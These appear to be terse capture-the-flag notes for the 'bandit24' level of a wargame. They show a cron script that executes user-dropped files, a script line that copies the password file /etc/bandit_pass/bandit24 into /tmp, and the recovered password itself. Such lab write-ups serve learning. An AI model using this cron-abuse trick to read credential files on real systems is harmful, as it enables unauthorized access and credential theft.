
cat /etc/cron.d/cronjob_bandit24

cat /usr/bin/cronjob_bandit24.sh
##!/bin/bash
#
#myname=$(whoami)
#
#cd /var/spool/$myname
#echo "Executing and deleting all scripts in /var/spool/$myname:"
#for i in * .*;
#do
#    if [ "$i" != "." -a "$i" != ".." ];
#    then
#        echo "Handling $i"
#        owner="$(stat --format "%U" ./$i)"
#        if [ "${owner}" = "bandit23" ]; then
#            timeout -s 9 60 ./$i
#        fi
#        rm -f ./$i
#    fi
#done

touch script.sh

nano script.sh

##!/bin/bash

# cat /etc/bandit_pass/bandit24 > /tmp/something

cat /tmp/something

#pass
#UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ



